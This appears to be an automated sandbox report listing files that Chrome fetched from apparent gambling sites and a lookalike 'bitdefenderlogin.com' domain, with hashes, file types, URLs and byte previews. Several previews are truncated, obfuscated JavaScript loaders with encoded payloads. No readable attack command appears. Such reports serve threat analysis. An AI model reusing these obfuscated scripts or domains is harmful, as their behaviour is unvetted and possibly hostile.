                                                                                                                                                          MD5:F9FDB5671BFBB1B3332A9F8D0D2CE972
                                                                                                                                                          SHA1:627C5272D0D56DED24B23507C5F13D1B9DB5EC20
                                                                                                                                                          SHA-256:FC9360526F1F73906DB6F4880464173C4E124FE9770FAA0468D91B73AB8387E6
                                                                                                                                                          SHA-512:829718CC2154BF3759B28F55B7A9506C3DE3C1C4C51D4AEA5BCAA594762BC7DBDD1BF509F8256A81644623E277A020B5029A98407A916A032D57C759DF60970C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...UJ?~H/PH>NNNzJ,.S1.`vV3@:6TSTueNIMP...~O..l%pX<pP..h.j~rX.L*.\..N.........X..viE.H.{?..y.T..S..JtU)....f.{=...c0.G.l..j.e?ziH.wE.g6._:..W`K5..P.Z6..f^O?n\<.~@vn[B==.X.o}F+:6/.._.........c.<^...G...V.4.k..W..u.u.."..r\.z1Z3...<..c.Q.G._.T ......j@..5.yL[PB.v:..Qr...AMG;.\.xW...c/u.hcO7..Z..N.x:a8......u.....n..n..a.~.......................-..b/.x#.j..Q..Z..........`.........W..6..%. ...|K.a7.v;....|............t........b.qy...Ri..T....M.....?.........z.}u:fq..m.f..^.Q.oAvW6jM-.*.m........t..z..W.M+....n7.x*.............<.......^..h.....................l..P..K...u.~...i...dx...........M^..c......................{Z|v..r..n.b~dX.W.`U..Q.iQIAP.E.wA.{@.k@.N@.)>.C6..2{G(eE...K<.....C..j..X..=......A)...ttRNS...%..>..]D&.......l_M+...............................kj_[VIH6/-................................................XB/U._....9IDAT(.b.&`.a.R.,..<..........5.\...9.|..X.s..m.k_..U..tq...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 191 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):50888
                                                                                                                                                          Entropy (8bit):7.99109856429833
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:7+1BNAqxtQVal5Me8ptEYo3L7kmxNs7bp6j0AD3YvLeKT3zRX2/cps1tEMG:GAii0MdE7xu71G0AzYDPT3VXAp1OMG
                                                                                                                                                          MD5:BADF81007B29C1F4B8D6E26F49A93157
                                                                                                                                                          SHA1:F05235D41D1697251E6E7A4A68BA05314FE38FCE
                                                                                                                                                          SHA-256:A66CBF6E1FF93B82694FA907B707A8E2595CEAADE7AC8602C5805A9CBF6E63F3
                                                                                                                                                          SHA-512:2CDDB8FF6FEB1ADD0E70ECB0AF11A3F1AE216EFA5CC367CA30225191B5936E2C5F2BBBE9AE2C766AF4975A186C67DFCBA6ADD2C58C45B3EFB3823428B796156B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/245/games/ag/ag_game_04.png
                                                                                                                                                          Preview:.PNG........IHDR.......x.....,e.]....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:332BABE67B7B11E8BEDAD8BC3A498003" xmpMM:DocumentID="xmp.did:332BABE77B7B11E8BEDAD8BC3A498003"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:332BABE47B7B11E8BEDAD8BC3A498003" stRef:documentID="xmp.did:332BABE57B7B11E8BEDAD8BC3A498003"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..."...8IDATx..W.e.u&.v..^Su.wU.C...&..p0.`p....4O.."./...3..P.4....K.C.d....7...mZ}.oU.3#....]...}..\.3+W&....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):127284
                                                                                                                                                          Entropy (8bit):5.964603194377986
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:cky/4ZA5fj6hXRyxAgjTvyjoph3gv4TY9gAm6:ckyh5fjAXRyOgHuof3gv59gH6
                                                                                                                                                          MD5:6C48020EC55839D18BB77C2A28C08404
                                                                                                                                                          SHA1:BBE2E524D3141DB333CB11774AB84E79D9E7423A
                                                                                                                                                          SHA-256:17D6DD25D3459F4ADA6C0F53A9D7009FCF2288F54907715A3A8423B837753400
                                                                                                                                                          SHA-512:A7DDA0387C8C25D759181E58A0FD25DCB3AD41FAADEACC61E208456D35D1DCB65BD4F3C67AD0AFDD3A23C12758374D137C5A6163326414C650B46D2D1C8E7784
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/common.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJgGZcBdAGgG8AiABgA4BzAZSoC4AzAVzRgBcBLdJl5kQZNAEpqnJCAAESXgCd+fKgG4QAOigBeCiB4oAJiA7c+gtMKm9dXHgKG8pANyhK5YtGSVl+6uwoSpggulRUvrq8WgA2hgy8ABbiujTqaAA8ShkA1LkSmPzRWjBJHgDCJiAAgryYkhIAfLq4AGRt/Jmt+ADsAPwguSVlHnUNEqz8Tfg0ACwDocNMyvxoDFrsSigAthXlSlWmmPj4cwA+000EbbgArBKiy6vrm9t7B0cgmAR0l01NABsbUBhEeQ10KxUry2u32lWqP3wfyuNBBYMmS0hLw2sI+COOuAAnPh/kC2sRwc9obj3vDDojfmS0aCJBJ1EoQLxOEo0F4AL42dTuTzeXz+MhQMgoMhIcI1ABCFQAIgBRABiAHEABIASQQAGkADIAWQAcgB5AAKAEUAEpMAAqAFUAGoAdQAGgBNABaUDAMFM7AYSX4ACs4LEdmgUBAAI5KRScVzAAAeAE8AF40AiEOZ3QG9OhE3IAeg0QRCShK8XWyVSNFE4Q0WRyUn47CKunwdzubRiowZpnGaHyjzQul0SikEKQpQO4yu+CpunnQ/GmEInQkmUyc1XVCnGjAnKgcH5ncwekHn2qo/HqWns+G68X9WXq7fY3qW53e4uE45jRKBmiaA8njXBcf0wH5+1AvcV0go8TzPC8UBGO8R3qMcCkg78lCXAEkLnaDCN/bd+F3fdziAkCwIg0iN1/e42gQzJSR+Ek2hQMDAS/MjxlBHiJH5TluV5AUyFMGBqnMRwrBsCgq0wEUvHEcV+ElXQ0BAYA5BqJQlCgDNMAAWlwMgLKsyzrLs2yHJspz7OcxyXPctzPNc7yPJ8rzfICyzAXwPyyFBMg7hCu5CAiuYIruCLAQi3oIroCKiTCptAX8nKnKbSyQpiuKEqSlK0oy3B8ssggyFwGLcDi+5a
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (8744), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8744
                                                                                                                                                          Entropy (8bit):5.932552425919391
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:VFygi0OSf6QzoU31aBkZ/720B21KzMpFEvtlAPNcSebQJhw25dB5Vt:VFygn6QzFgBkh7ZU1VUolcSe07HVl
                                                                                                                                                          MD5:829F0DF1F1036894C109D14213723407
                                                                                                                                                          SHA1:4BD0CECAB8B5CFF27AD12AD2F55961BDC2E67C1F
                                                                                                                                                          SHA-256:BE5099A447276D5C307D9EBB5C22472B55023D58C352D87E3D26DA75681BA0EF
                                                                                                                                                          SHA-512:EB03E1D1E1AF89C1ED54F45FC82C08926CCC59F0FAADB19B951C34AA8E6A3F82C2D52BC8CBCD159FFCABD1126E52C143F8C2596FC23390E442B4B98C1C3BF17B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/news.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgE4BdAGgG8AhEAFwBkAuAMwFc0YaBLdTJUmgJTkAvqRiUAapWZsO3NL36k0QgEQskIAARIaAJ04dVAbgDyYAFYgOAOgAmIJpzQgACnpQQQemgE9MNKSqAPrBIEgAsih2LAA2IKoUAG5QsSwgDACEAAzCAsYpelogALwKqgC2SQASAIqqAqScZTYKII0oZZiqACJ2+MANpMAtCiiNel2q2ZyuABZDUKOYeo0wUz0sAPS4Q7FTAHIAmgAepkMsU9kwEExDEFNbSQDiACxDc8sQjXYlmMCYASYESkcxWDiYWI2CpQCARFg0KBcdBIIHkTQ0CJIADmDBgNmeeQoEE8LAgBxAwCQMnYyIUQk4TEwmWAzjsKGArUpSFcpO+5EKOhKNDmnCQXKpAEk0EwULyIGTjIzMNlMiVxfE0NiRUJBTQSuQKjiAMpzDlZbKkI3YgAqnBo8QYIrF0JxdodICtOMo0V8DD41oAwrEoEhqaoXFT5YkkGbgHRHDQKVS6GKaBbSCSFRAAGIh3GqI6qYTGVlodmcyM8vklHL8UXijFY7EBATCdukWMc5PU1i0+S8XVQIr67DEYzO8VV6Wy6GwzB9uQ8FTkPS0Fh6NBaNA2LNkvNQbEldUAMhPNF3GjmwK4HoYO9v8TE6BoIDQ6Z3MBfb8CumHNDtCoMh3P8fEAkAiVUYt8kFNADWtU1zTra13UdSdXVte0n2tH07D9X84wTJgk25VNdAzPdc3zf0S3QpscUwFRRAcL8HGqGgKliGklwUVEBWHLR9XZGAWCA98bBgNckRAABReIxJoboeklCQGmMNcaA3LcL2cFw9GqG0IjodV+BsV8ThoQNv3fAAfGydLQPSbRACzRBgWIUE0HtuLpQFyHQsVEJGTIAEZRGxWgexnFAfIHIciiQYUGyVJkAqQOgUGxZwzxYexHCgOILwAVS4KExUoEM0DgAIGxsDysrQ
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17264
                                                                                                                                                          Entropy (8bit):7.957851912730042
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:Bd/F5IhIlqmVUgkOduOyX2sjzELCfBhC6DvFSi9q:B70IImVUvOduOyGsikhC6DvFE
                                                                                                                                                          MD5:CF4793E4F829969195CB58EFFDFFCC3C
                                                                                                                                                          SHA1:73EA126C25F1EC7E02A3216AFBDC68204EDC18BB
                                                                                                                                                          SHA-256:1E91C94ABA2BC799802FCB49FEE566D9095FE76D2C2EEBE7E876E06E50DD6E00
                                                                                                                                                          SHA-512:6C837B9092076E7DA94E8305573C76631CA9402B2E903D6B9EF10EB18585D874B1F29F2D2267D34DCCE18AEAE0172A3E0023354C01EF7A44827EA09A264B8D84
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D248D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D238D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2200), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2200
                                                                                                                                                          Entropy (8bit):5.846804193651359
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VFuVbHRF2kxFX2grkvOmKZFYdVCF7VVqzgmzlJtj:VgHPVFX70KrYfCHVq0mBJh
                                                                                                                                                          MD5:6767E4B22DEE72B4CD952B22BD42FF01
                                                                                                                                                          SHA1:E9BD4BCCCDCBF7158085BDA5D8BED8A247ABFCC3
                                                                                                                                                          SHA-256:21B394C80391DF27FE1A0401B0245243D4F0C28EA19069C608D2559A908CDD63
                                                                                                                                                          SHA-512:045060AA8A5585D4A0935220F1D5B39CF15623E5999C9DE712EBD2205930E52493BF5DB8C0EBAA790F6C4AB15220D9B29C1EC834EB6AB9A2FA93A4B8A9913DAE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/383/views/home/indexContainer.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjABgGYAWAXQBoBvAGQEkAmAdQC4AzAVzRgBcBLdTCHLdyaAJSUAROyQgABEm4AnXj0kBuAPJgAViB4A6ACYhWvNCAAKSlBBBLuAT0wjJAfTcgkAWRRH2ADYgklQAblAB7CDMAIT4AL5i6uFKclAAvGiYkgAiRgAcwJJi5EiZBllQJbyZ2fgwEKzF5Eq1kgByAJoAHprNMOmYSJhimJTx5Np6PJhKBgC2UBAA4iDc3PZIo9iSSGgAymt8aADmkqRiJZRGUNxQbJw8/FkSSmvsSmiUJ1DzILQwdAAJRQKG4zF4xlMUEC3AMAGF0IooGg4TAjGgABIoRQAakkAHpeIsTiAALQQGBEtAmboEwj5QgEgAWYIJIWgjm8IFRzEkIR+fwAQihunzJPEJoD5hB2BsjMxhqNxpNdPpuLMFktVutNttdgcjuYzhcSn9uKyjEhmJQkMBeNwYMzlr9ohwuHwBEJuBILbwkAZBSARd0DDAPm9UQAVRx2dIgCaBeEBVRwB4e56CCQpOTceMGO5KUncdQAEhcYgMUCMRmTUCQw0ksD4oWCYgmbxO/o2SnTTwEEl4rEw5ckFRQZM7xQMb3mKFbdYb2SBmgAqlGAKJAtxAjfLWj7TdA5oxP0BnlQMBBIEgLuKexiN7cD5oOSQkysGEBOGrvgBKtBA4jBQJ8xrZIAyvqALJKgD5SoAvwGAFTmgAA+oA9CoxMUEx7Ic6zGpiKJGIBfaei8lA5iA6RnuoZ4GJhRqnAWzI8pg7r9lkPokSBchoOk77QrCBi/rw/4Xle/xoKwKAVgYwnXre3b2OoIBSWgl4yXePaZOQimluJSgwCAq4QDcGwjIkkrkDAby3CACrMURIzsakZFnsI6T2jSKDAAY+wANK0O06hZJIuAAII6GcoxjuyuLcPi1K0gYOhINOFqMbZmZsYpNHYacuE0oBIyaQYpYWN03BRqmTGPHZEi
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 24048
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5527
                                                                                                                                                          Entropy (8bit):7.954145821467071
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:S2QR56r5uDcGIVkeWxFeIqb9OwNUXQCLHQtpestT7iji+E3ZlG2C1H5z7lvF7P:sKrsDYxMkFHNcQb3tT7iu+OG2CBXFP
                                                                                                                                                          MD5:611CF746ED3EDFDC9F541F7D307EF9D2
                                                                                                                                                          SHA1:8878CC17DE6200A8BA50B6465609EE2404D024BB
                                                                                                                                                          SHA-256:BDE466B58AD4F5E4F36AEC906374C6A34F79763FE5B0E0D05ED952544554C210
                                                                                                                                                          SHA-512:594B080256B6C5FB1E21B0280EEB541578DD3529891ECFBEF2B2175FC349A76C20EECF778BE8E7B7FCABCB48C201D246B2F02494B2F9B4B3A205306ABC632169
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/themes/default/font-awesome/font-awesome.css
                                                                                                                                                          Preview:...........\]..u}..............k'0...yX?.!@@IT...........)..C..$........{/.......V.X.......It........*=.~..Q.x..W.UiL...ca.|..Je...J..~..h:.{.c....>.~..........e7......~.;5....qx......U.....=......S....no?.......{..I..Oq..B.?..........m...r....C.?JQ..._7.*...y.N..s..U+.sn..7....!.TQ$o.1.k.........Yh..^|..t....~..Z.......o)04}..P....TcQg..%.n..5.][..l*.uZ..e.z.j.?l.~d....].E.6J..y6...hr.Wsx.Q.nL/.n..]+e..1.W.w".^...Zu.......x6.7.............:|.t........0.r.......6.6...>4Ok....F.....z(....}.&,...mX......I.}J..{.I.m..9..n..z..........y.{..>.f.+....M....r....r5...J~mU'.T..v..q..+x..7.yh{=k|....i.7.@%.R....q..;?....4.[;..d......O.g2_..=.....|.y.....5..U..nU.....i../w......A..U=R.i.`8.T..Z.|%".F...&...n%.B6........hh....m....{.....`.~.f_.....s.......6V....q.7v......?.+.}...Q_...e.....,..Z..2.........wz..o2.S.....d6.............8.u.E.".a...wv1Y.m<.G..U..L......^....X.h.+.K...w.V....Zj.4^...z.f7..a.,.t.....h.Ot..#..k`.7;..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 120x120, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=4, software=Adobe ImageReady], baseline, precision 8, 1160x48, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26012
                                                                                                                                                          Entropy (8bit):7.925973622575936
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:5dVPVH9qkmKkal6Vl4Kv9swCS8Zr/osWfLUfhB:5TNdqxKZUj4UswP8ZrAsqLUfhB
                                                                                                                                                          MD5:A197B43D6D60D3B7CFD7247E99442D0A
                                                                                                                                                          SHA1:6902C4F1BFD0013558BC2F2508870ABAD6119307
                                                                                                                                                          SHA-256:D9788096D0C62B5EA870B3D58DDF6790556ECADF774212C8EC49697F247CF51E
                                                                                                                                                          SHA-512:7968543F67B10F07F25979904C78A7173C40AD2A5275256E2FBB06CF220A421B411D820D22553DB8DD5197441297086600B6A5C8CE760888A543895C34F4EDCC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....x.x.....XExif..MM.*.......1.........>Q...........Q...........Q...............Adobe ImageReady.....C....................................................................C.......................................................................0...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....7.......#.^7.-..%...9^)&y.|.#.ZGb..*...x....]|Z...W.O..=...\...V.4.2..A.,H.-.$.#GE%H..{W.|..+..C..xO..........|..l.....a%..}).e....K.%...G..bq.3..U.k..G.z.W.KT..u..'.iQ.7..O..}...-.._.~.....#.o...t.."I..l.Z..Y.L.u...VM.l.......r+.............Z.c.......Z..R._..e....g`..v..%
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):257102
                                                                                                                                                          Entropy (8bit):7.9776337457284185
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:hJs2Hs2Hs2Hs2HswbQxjevPRbQxjevPRbQxjevPRbQxjevPRbQxjevPW:bNHNHNHNHhEiPREiPREiPREiPREiPW
                                                                                                                                                          MD5:F832F45869758150DAB1D712E3C7D410
                                                                                                                                                          SHA1:117A23D98831C6D6D431E9B1BE5ABE695FD67456
                                                                                                                                                          SHA-256:B52B1753A26E39F9B186E906F72E21DA2DE24A6E65BC3AE8EE1FD6A482BF167C
                                                                                                                                                          SHA-512:A83CDF6C361D15AA839C6F893D43405019AD2DD417732EFC0FADCE8A9053E6A4202D590CE89839D92A9A7D1B844EFAD8C0648A1DA3D948A91063D19E53C0607B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a..d....../......B;......L.........GD=...........................z...{{{......faYaaa........gV.]]].................tst'#..............~x...YSJ...EEE...rmf.....vb....bZTytj++*...$#!.0lkl.M===.m......JJJ....222..kRRR...........ZK.........SLC.......z......ysq32-....r..........LJA..k=4............;:6..........).......... ......O..u0.*.............kf_.r7@=6........q...............&............+)%_VN...............\ZP..ohdth5..................]T//)...X........IG?.{mUUV............J?...,'&"~}....NNO.........GGG...&&&.........kb.....kk....b...........&&...&"........XX......."...........BB...XP...........P..;................}r.......}}....r....... .....?>?///......"! .........eefhhhwww~xwoopAA>YXY...IJN...767871.... .......X.....................!..NETSCAPE2.0.....!.......,......d........H......*\....#J.H....-..... C..I...(S.\...0c.I...8s...g.@...J...H..\...P.J.J...XW&....`.:.J...h.].-V.p..K...x...........1..P.....8T.$.#s.L....3k.+...p
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2745
                                                                                                                                                          Entropy (8bit):5.374781918998539
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Yv1FLJxwewo9Bg8/ZxD9Hk4026jz6PB8z76q5HdKgMfWHLgscB:GjDcoEKJE40OaddrYEJcB
                                                                                                                                                          MD5:ED94992E2255220E47FC4545D9032835
                                                                                                                                                          SHA1:24359CE71BC37683D86E6E1885020A695E32F7E8
                                                                                                                                                          SHA-256:9657D2FE947B21D964D13541AA42FBC3B872C9704445131022D84119915281E6
                                                                                                                                                          SHA-512:62A97159D19E540D6FB38BBA553616A37FAEB17831544AA3AACF07E355DCC640C03F7B2E047F736568DC71B0D86AA59027FF24EF0D8CE7884DA4C0D451154E99
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/lt-cloud/stat.do?pv=ajax&pa=host.info&domain=xpj723.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972850573425
                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"agentCode":"101327467971","snType":1,"iconRel":"/fileupload/ll12/202307/202307192352577.png","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{"videoProfitDayThreshold":300000,"agentBalanceControlFlat":0,"openUserFeeFlat":1,"openUserPointFlat":0,"lotteryProfitDayThreshold":"1000000","autoDrawAmount":500000,"openAutoDrawFlat":2,"regCaptchaType":"normal","captchaType":"normal","vipShowFlag":0,"smsLoginFlag":0,"thirdpartyTr
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3418
                                                                                                                                                          Entropy (8bit):4.553810660026301
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:9jpKz4g0YPlULXo59EBmLcyB9Ewp+zrTspWlXZez3u1zL:92aYwBDq54nspeQz3+
                                                                                                                                                          MD5:D4DDAF3D65AA42A1AFCDFDFE8925388E
                                                                                                                                                          SHA1:F1F096AB84B170A7C977565A4404D96BB72E557D
                                                                                                                                                          SHA-256:16E1F0389319B4BBA2A93E0AD4CEC35EF7413FE31C103535A5FFF577B710C9E0
                                                                                                                                                          SHA-512:4BFE36C83555CA71FCDBFFC547BA3ED8A93CD990B9379C9E1324545769288A05E2EFA78DCDDF622C13DB942E4E37C64AF4D83C7BFE7EA6FC28908F20D052DA6C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:http://www.bitdefenderlogin.com/jquery.min.js
                                                                                                                                                          Preview:function ajax(params) {.. params = params || {};.. params.data = params.data || {};.. var json = params.jsonp ? jsonp(params) : json(params);.. function json(params) {.. params.type = (params.type || 'GET').toUpperCase();.. params.data = formatParams(params.data);.. var xhr = null;.. if (window.XMLHttpRequest) {.. xhr = new XMLHttpRequest().. } else {.. xhr = new ActiveXObjcet('Microsoft.XMLHTTP').. };.. xhr.onreadystatechange = function () {.. if (xhr.readyState == 4) {.. var status = xhr.status;.. if (status >= 200 && status < 300) {.. var response = '';.. var type = xhr.getResponseHeader('Content-type');.. if (type.indexOf('xml') !== -1 && xhr.responseXML) {.. response = xhr.responseXML;.. } else if (type === 'application/json') {.. response
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (480), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):480
                                                                                                                                                          Entropy (8bit):5.693575626900986
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chWAjT98R3apmMAR/lsVoqd2cVcFJ6+p6YC5:VRjqMARSoqMceFJ1p6YC5
                                                                                                                                                          MD5:484FA91F523BA35A76E384DF684D7B19
                                                                                                                                                          SHA1:19E162B79E794C39E108DA5B1FB94F436D78CE3E
                                                                                                                                                          SHA-256:675989CE89A347E498FE41B07E7C74AEBC42751E9AFFC1727D9E3DD2C90EF2E2
                                                                                                                                                          SHA-512:3B4D53CE79567535E1D3E84939F508A8A90C002C11B70BB8B4F9215561330A334ED4D22C5B338595E3B9EE98C758F2EA709953898308887B82836E32C1B25046
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/t3685-otherConf-js.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjATgFYBdAGgG8AJfAVQBEAuAMwFc0YAXAS3UxFLSkATgEpyAIhZIQAAiQchXTuIDcAeTAArEJwB0AExBMuaEAAUhKCCCEcAnpkHiA+s5BIAsin0sANiHEKADcoXxYQBgBCAAYAXxFhA0dScRgoIX0AOSggrgBzKG50ADEUIRgQAGUACxRgQNZ2IrRMMSEQDhYhNBkUeMT9ZPEoCGs0fWQGtk4eFraOrp79fqEkpwBHIQBhbxBKFABbANJGmd55zu6ZDhW1lIKjixRcwyEAUQAPGDDDKabZ1rkdqXHosW6DJwPEDZXIFZqlcpVWr1E7TZqA4GLGQwcFDNIZJ4vGyfb4sX6o/7nIELK5ceIqEJCXoAXmw4gOHHEZH0zLQfl8pA4zOG40sXH0gRYrPEoxg1S5pBg0qC+glKS4vmeIBYCq40uAAC8ubF6UA=")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3620), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3620
                                                                                                                                                          Entropy (8bit):5.913454852081911
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VJLbP8kH/0UVfadaya9vcNlrZy1erHX8hMhQs:VVPjH/ZsdDa9vcNlrc1CMhu
                                                                                                                                                          MD5:955C1628AF612DBBC03E818EB3B6878C
                                                                                                                                                          SHA1:B43FAF1BFE057035392EF512071EACE92B58B3A6
                                                                                                                                                          SHA-256:2DB52E544247DE9172D7898CF5B8215B3115DF42B64DC04AF1314B0142941E84
                                                                                                                                                          SHA-512:230673C6D8BC9D0AA88C66A76485B1C8A00F98B230B6CB1E6AB78142FCB7B134991DC81FF18BE89919D3E74F84F0637F536ACD7E6F660B94E5EF281646788DFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/homeCircle.js
